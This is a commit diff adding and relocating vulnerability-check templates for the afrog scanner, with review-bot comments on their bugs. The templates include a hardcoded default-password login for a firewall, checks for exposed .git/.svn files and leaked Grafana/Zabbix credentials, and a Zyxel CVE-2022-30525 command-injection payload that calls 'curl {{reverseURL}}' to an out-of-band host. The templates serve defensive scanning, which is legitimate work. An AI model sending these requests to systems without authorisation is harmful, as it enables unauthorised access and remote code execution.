add 72 pocs
zan8in committed Jul 10, 2022
1 parent 5805563 commit 959cd33
Showing 80 changed files with 172 additions and 132 deletions.
29 changes: 0 additions & 29 deletions afrog-pocs/CVE/2022/CVE-2022-30525.yaml

This file was deleted.

74 changes: 0 additions & 74 deletions afrog-pocs/fingerprint/phpmyadmin-panel.yaml

This file was deleted.

4 changes: 2 additions & 2 deletions cmd/rules/main.go
Expand Up @@ -8,8 +8,8 @@ import (
)

func main() {
c := catalog.New("./afrog-pocs")
allPocsYamlSlice, err := c.GetPocPath("./afrog-pocs")
c := catalog.New("./pocs/afrog-pocs")
allPocsYamlSlice, err := c.GetPocPath("./pocs/afrog-pocs")
if err != nil && len(allPocsYamlSlice) == 0 {
fmt.Println("未找到可执行脚本(POC),请检查`默认脚本`或指定新の脚本(POC)")
}
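Review bot: The new directory literal `"./pocs/afrog-pocs"` is written twice, once for `catalog.New` and once for `c.GetPocPath`, so the two can drift apart the next time the rules move; hoist it into one constant, `const pocDir = "./pocs/afrog-pocs"`, and pass `pocDir` to both calls. The path is relative, so it resolves against the process working directory rather than the location of the binary — presumably intended for this rules tool, but a one-line comment saying so would save the next reader a guess. main continues below the hunk, so whatever follows the `fmt.Println` on the error path is out of view here.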
2 changes: 1 addition & 1 deletion internal/runner/banner.go
Expand Up @@ -9,7 +9,7 @@ import (
)

func ShowBanner() string {
return log.LogColor.Bold("afrog ") + log.LogColor.Banner("人生如戏.戏如梦")
return log.LogColor.Bold("afrog ") + log.LogColor.Banner("真的想你")
}

func ShowUsage() string {
64 changes: 62 additions & 2 deletions pocs/afrog-pocs/a-fingerprinting/phpmyadmin-panel.yaml
Expand Up @@ -10,5 +10,65 @@ rules:
request:
method: GET
path: /phpmyadmin/
expression: response.status == 200 && response.body.bcontains(b'<title>phpMyAdmin') && response.body.bcontains(b'pmahomme') && "v=([a-z0-9-._]+)".bmatches(response.body)
expression: r0()
expression: response.status == 200 && response.body.bcontains(b'<title>phpMyAdmin') && response.body.bcontains(b'pmahomme') && 'v=([a-z0-9-._]+)'.bmatches(response.body)
r1:
request:
method: GET
path: /phpMyAdmin/
expression: response.status == 200 && response.body.bcontains(b'<title>phpMyAdmin') && response.body.bcontains(b'pmahomme') && 'v=([a-z0-9-._]+)'.bmatches(response.body)
r2:
request:
method: GET
path: /xampp/phpmyadmin/
expression: response.status == 200 && response.body.bcontains(b'<title>phpMyAdmin') && response.body.bcontains(b'pmahomme') && 'v=([a-z0-9-._]+)'.bmatches(response.body)
r3:
request:
method: GET
path: /web/phpmyadmin/
expression: response.status == 200 && response.body.bcontains(b'<title>phpMyAdmin') && response.body.bcontains(b'pmahomme') && 'v=([a-z0-9-._]+)'.bmatches(response.body)
r4:
request:
method: GET
path: /typo3/phpmyadmin/
expression: response.status == 200 && response.body.bcontains(b'<title>phpMyAdmin') && response.body.bcontains(b'pmahomme') && 'v=([a-z0-9-._]+)'.bmatches(response.body)
r5:
request:
method: GET
path: /forum/phpmyadmin/
expression: response.status == 200 && response.body.bcontains(b'<title>phpMyAdmin') && response.body.bcontains(b'pmahomme') && 'v=([a-z0-9-._]+)'.bmatches(response.body)
r6:
request:
method: GET
path: /php/phpmyadmin/
expression: response.status == 200 && response.body.bcontains(b'<title>phpMyAdmin') && response.body.bcontains(b'pmahomme') && 'v=([a-z0-9-._]+)'.bmatches(response.body)
r7:
request:
method: GET
path: /phpmyadmin/
expression: response.status == 200 && response.body.bcontains(b'<title>phpMyAdmin') && response.body.bcontains(b'pmahomme') && 'v=([a-z0-9-._]+)'.bmatches(response.body)
r8:
request:
method: GET
path: /blog/phpmyadmin/
expression: response.status == 200 && response.body.bcontains(b'<title>phpMyAdmin') && response.body.bcontains(b'pmahomme') && 'v=([a-z0-9-._]+)'.bmatches(response.body
r9:
request:
method: GET
path: /apache-default/phpmyadmin/
expression: response.status == 200 && response.body.bcontains(b'<title>phpMyAdmin') && response.body.bcontains(b'pmahomme') && 'v=([a-z0-9-._]+)'.bmatches(response.body)
r10:
request:
method: GET
path: /administrator/components/com_joommyadmin/phpmyadmin/
expression: response.status == 200 && response.body.bcontains(b'<title>phpMyAdmin') && response.body.bcontains(b'pmahomme') && 'v=([a-z0-9-._]+)'.bmatches(response.body)
r11:
request:
method: GET
path: /_phpmyadmin/
expression: response.status == 200 && response.body.bcontains(b'<title>phpMyAdmin') && response.body.bcontains(b'pmahomme') && 'v=([a-z0-9-._]+)'.bmatches(response.body)
r12:
request:
method: GET
path: /admin/phpmyadmin/
expression: response.status == 200 && response.body.bcontains(b'<title>phpMyAdmin') && response.body.bcontains(b'pmahomme') && 'v=([a-z0-9-._]+)'.bmatches(response.body)
expression: r0() || r1() || r2() || r3() || r4() || r5() || r6() || r7() || r8() || r9() | r10() || r11() || r12()
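Review bot: The r8 expression (the `path: /blog/phpmyadmin/` rule) is missing its closing parenthesis — `'v=([a-z0-9-._]+)'.bmatches(response.body` — and the final expression joins r9 and r10 with a single `|` instead of `||`, so the expression parser should reject this file as written; the fixes are `'v=([a-z0-9-._]+)'.bmatches(response.body)` and `... || r9() || r10() || ...`. r7 requests `/phpmyadmin/`, the same path as r0, so it is a duplicate request and can be dropped. The thirteen per-path expressions are identical apart from the path; if the rule format allows it, a single shared expression would make slips like these harder to introduce.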
File renamed without changes.
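--- /dev/null
+++ b/pocs/afrog-pocs/e-vulnerability/git-leak.yaml
@@ -0,0 +1,25 @@
+id: git-leak
+
+info:
+name: Git 代码托管泄漏
+author: zan8in
+severity: critical
+
+rules:
+r0:
+request:
+method: GET
+path: /.git/config
+expression: response.status == 200 && response.body.bcontains(b'[core]') && response.body.bcontains(b'repositoryformatversion') && response.body.bcontains(b'[branch')
+r1:
+request:
+method: GET
+path: /.git/index
+expression: response.status == 200 && response.body.bcontains(b'BIRC') && response.body.bcontains(b'repositoryformatversion') && response.body.bcontains(b'[branch')
+
+r2:
+request:
+method: GET
+path: /.git/HEAD
+expression: response.status == 200 && response.body.bcontains(b'refs/heads') && response.body.bcontains(b'repositoryformatversion') && response.body.bcontains(b'[branch')
+expression: r0() || r1() || r2()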
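Review bot: The r1 and r2 expressions reuse r0's `.git/config` markers (`repositoryformatversion`, `[branch`) while fetching `/.git/index` and `/.git/HEAD`, whose bodies do not carry those strings, so r1 and r2 can never be true and only r0 contributes to the verdict. `b'BIRC'` in r1 also looks like a typo for the index file's `DIRC` signature. Each rule should test only markers that belong to the file it requests — for r2 `response.body.bcontains(b'refs/heads')` on its own, for r1 the index signature — or the two dead rules should be removed so the file documents what it actually checks.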
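--- /dev/null
+++ b/pocs/afrog-pocs/e-vulnerability/svn-leak.yaml
@@ -0,0 +1,14 @@
+id: svn-leak
+
+info:
+name: SVM 代码托管泄漏
+author: zan8in
+severity: critical
+
+rules:
+r0:
+request:
+method: GET
+path: /.svn/entries
+expression: response.status == 200 && response.body.bcontains(b'-props') && response.body.bcontains(b'svn://')
+expression: r0()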
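Review bot: The `name` field reads `SVM 代码托管泄漏` while the id is `svn-leak` and the request targets `/.svn/entries`; `SVM` is a typo for `SVN`, so it should be `name: SVN 代码托管泄漏`. The second marker, `svn://`, ties the match to repositories checked out over the svn scheme; an entries file for a repository accessed over http(s) would not contain it, so the rule presumably under-reports those — worth a comment if that is accepted.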
File renamed without changes.
@@ -1,19 +1,19 @@
id: CNVD-2020-73282

info:
name: 佑友防火墙弱口令
author: 你是猪!!!
severity: high
description: fofa title="佑友防火墙"

rules:
r1:
request:
method: POST
path: /index.php?c=user&a=ajax_save
headers:
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
body: username=admin&password=hicomadmin&language=zh-cn
expression: |
response.status == 200 && response.body.bcontains(b'"success":true') && response.body.bcontains(b'"message":') && response.raw_header.bcontains(b'Set-Cookie') && response.raw_header.bcontains(b'FWSESSID=')
id: CNVD-2020-73282

info:
name: 佑友防火墙弱口令
author: 你是猪!!!
severity: high
description: fofa title="佑友防火墙"

rules:
r1:
request:
method: POST
path: /index.php?c=user&a=ajax_save
headers:
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
body: username=admin&password=hicomadmin&language=zh-cn
expression: |
response.status == 200 && response.body.bcontains(b'"success":true') && response.body.bcontains(b'"message":') && response.raw_header.bcontains(b'Set-Cookie') && response.raw_header.bcontains(b'FWSESSID=')
expression: r1()
File renamed without changes.
File renamed without changes.
File renamed without changes.
File renamed without changes.
File renamed without changes.
File renamed without changes.
File renamed without changes.
File renamed without changes.
File renamed without changes.
File renamed without changes.
File renamed without changes.
File renamed without changes.
File renamed without changes.
File renamed without changes.
File renamed without changes.
File renamed without changes.
File renamed without changes.
File renamed without changes.
File renamed without changes.
File renamed without changes.
File renamed without changes.
File renamed without changes.
File renamed without changes.
File renamed without changes.
File renamed without changes.
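--- /dev/null
+++ b/pocs/afrog-pocs/g-CVE/2022/CVE-2022-23944.yaml
@@ -0,0 +1,20 @@
+id: CVE-2022-23944
+
+info:
+name: Apache ShenYu Admin Unauth Access
+author: cckuakilong
+severity: critical
+description: Apache ShenYu suffers from an unauthorized access vulnerability where a user can access /plugin api without authentication. This issue affected Apache ShenYu 2.4.0 and 2.4.1.
+reference:
+- https://github.com/apache/incubator-shenyu/pull/2462
+- https://nvd.nist.gov/vuln/detail/CVE-2022-23944
+- https://github.com/cckuailong/reapoc/blob/main/2022/CVE-2022-23944/vultarget/README.md
+- https://lists.apache.org/thread/dbrjnnlrf80dr0f92k5r2ysfvf1kr67y
+
+rules:
+r0:
+request:
+method: GET
+path: /plugin
+expression: response.status == 200 && response.body.bcontains(b'"message":"query success"') && response.body.bcontains(b'"code":200')
+expression: r0()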
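--- /dev/null
+++ b/pocs/afrog-pocs/g-CVE/2022/CVE-2022-26148.yaml
@@ -0,0 +1,20 @@
+id: CVE-2022-26148
+
+info:
+name: Grafana & Zabbix Integration - Credentials Disclosure
+author: Geekby
+severity: critical
+description: |
+Grafana through 7.3.4, when integrated with Zabbix, contains a credential disclosure vulnerability. The Zabbix password can be found in the api_jsonrpc.php HTML source code. When the user logs in and allows the user to register, one can right click to view the source code and use Ctrl-F to search for password in api_jsonrpc.php to discover the Zabbix account password and URL address.
+reference:
+- https://2k8.org/post-319.html
+- https://security.netapp.com/advisory/ntap-20220425-0005/
+- https://nvd.nist.gov/vuln/detail/CVE-2022-26148
+
+rules:
+r0:
+request:
+method: GET
+path: /login?redirect=%2F
+expression: response.status == 200 && (response.body.bcontains(b'"zabbix":') || response.body.bcontains(b'"zbx":') || response.body.bcontains(b'alexanderzobnin-zabbix-datasource')) && '"password":"(.*?)"'.bmatches(response.body) && '"username":"(.*?)"'.bmatches(response.body)
+expression: r0()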
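Review bot: The regexes `'"password":"(.*?)"'` and `'"username":"(.*?)"'` accept an empty value, so a page that merely contains `"password":""` — a datasource with blank credentials — satisfies r0 although nothing is disclosed; requiring at least one character, `'"password":"([^"]+)"'` and `'"username":"([^"]+)"'`, avoids that false positive. The `description` block also doubles as a click-by-click walkthrough; the `reference` entries already cover that, so the description could be trimmed to its first two sentences, which state the issue and the affected versions.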
16 changes: 10 additions & 6 deletions pocs/afrog-pocs/g-CVE/2022/CVE-2022-30525.yaml
Expand Up @@ -2,12 +2,15 @@ id: CVE-2022-30525

info:
name: Zyxel Firewall - OS Command Injection
author: zan8in
author: h1ei1,prajiteshsingh
severity: critical
description: |
Rapid7 发现并报告了一个漏洞,该漏洞影响支持零接触配置 (ZTP) 的 Zyxel 防火墙,其中包括 ATP 系列、VPN 系列和 USG FLEX 系列(包括 USG20-VPN 和 USG20W-VPN)。该漏洞标识为 CVE-2022-30525,允许未经身份验证的远程攻击者以nobody受影响设备上的用户身份执行任意代码。
title="USG FLEX"
An OS command injection vulnerability in the CGI program of Zyxel USG FLEX 100(W) firmware versions 5.00 through 5.21 Patch 1, USG FLEX 200 firmware versions 5.00 through 5.21 Patch 1, USG FLEX 500 firmware versions 5.00 through 5.21 Patch 1, USG FLEX 700 firmware versions 5.00 through 5.21 Patch 1, USG FLEX 50(W) firmware versions 5.10 through 5.21 Patch 1, USG20(W)-VPN firmware versions 5.10 through 5.21 Patch 1, ATP series firmware versions 5.10 through 5.21 Patch 1, VPN series firmware versions 4.60 through 5.21 Patch 1, are susceptible to a command injection vulnerability which could allow an attacker to modify specific files and then execute some OS commands on a vulnerable device.
reference:
- https://www.rapid7.com/blog/post/2022/05/12/cve-2022-30525-fixed-zyxel-firewall-unauthenticated-remote-command-injection/
- https://github.com/rapid7/metasploit-framework/pull/16563
- https://www.zyxel.com/support/Zyxel-security-advisory-for-OS-command-injection-vulnerability-of-firewalls.shtml
- https://nvd.nist.gov/vuln/detail/CVE-2022-30525
- http://wiki.peiqi.tech/wiki/iot/Zyxel/Zyxel%20USG%20FLEX%20handler%20%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E%20CVE-2022-30525.html

set:
Expand All @@ -20,6 +23,7 @@ rules:
path: /ztp/cgi-bin/handler
headers:
Content-Type: application/json
body: "{\"command\":\"setWanPortSt\",\"proto\":\"dhcp\",\"port\":\"4\",\"vlan_tagged\":\"1\",\"vlanid\":\"5\",\"mtu\":\"; curl {{reverseURL}};\",\"data\":\"hi\"}"
expression: reverse.wait(5)
expression: r0()
body: |
{"command":"setWanPortSt","proto":"dhcp","port":"4","vlan_tagged":"1","vlanid":"5","mtu":"; curl {{reverseURL}};","data":"hi"}
expression: response.status == 500 && reverse.wait(5)
expression: r0()
